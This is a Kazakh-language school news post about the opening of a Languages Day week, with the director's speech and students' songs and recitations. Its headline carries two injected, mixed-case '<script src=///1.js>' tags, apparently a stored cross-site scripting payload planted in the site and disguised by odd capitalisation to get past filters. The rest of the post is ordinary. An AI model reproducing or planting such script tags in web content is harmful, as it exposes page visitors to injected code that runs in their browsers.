Октябрьдің 50 жылдығы атындағы орта мектебінде 2020-2021 оқу жылында Қазақстан Республикасы халықтарының Тілдер күні мерекесіне орай өткізетін іс-шаралардың ашылуы өткізілді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.09.2020
Мектебімізде 07 қыркүйек күні Қазақстан Республикасының Тілдер күні мерекесіне арналған «Тілім менің баға жетпес байлығым»атты тілдер апталығының ашылуы өткізілді.Салтанатты жиын Қазақстан Республикасының Әнұранымен ашылды.Жиында сөз алған мектеп директоры Магизамов Төремурат Серикович тәуелсіз елдің мемлекеттік тілі мәртебелі де тұрақты болып,өрістеп дамуына үлес қосу -жас жеткіншектердің жауапкершілігінде болатын міндет екендігіне тоқталып,ана тіліміздің мерейлі мерекесімен құттықтады.Шараны пән мұғалімдері Мағзұм А.А,Магизамов Т.С,Хамзин Е.Ш ,Момышұлы Ш дайындаған оқушылардың үш тілдегі әдеби монтажы жалғастырды.Оқушылар өздерінің музыкаға деген қабілеттерін аңғартып ,ән мен жырдан шашу шашты. 8сынып оқушылары Отарова Гулзан,Балғабай Жаннур,9 сынып оқушысы Алимгазина Жасмина «Салкүрен»күйін орындады.9Б сынып оқушысы Абрамович Мейрамгуль Желсіз түнде жарық ай әнің шырқады.
Әдістеме бірлестігі жетекшісі:Опабекова А.Р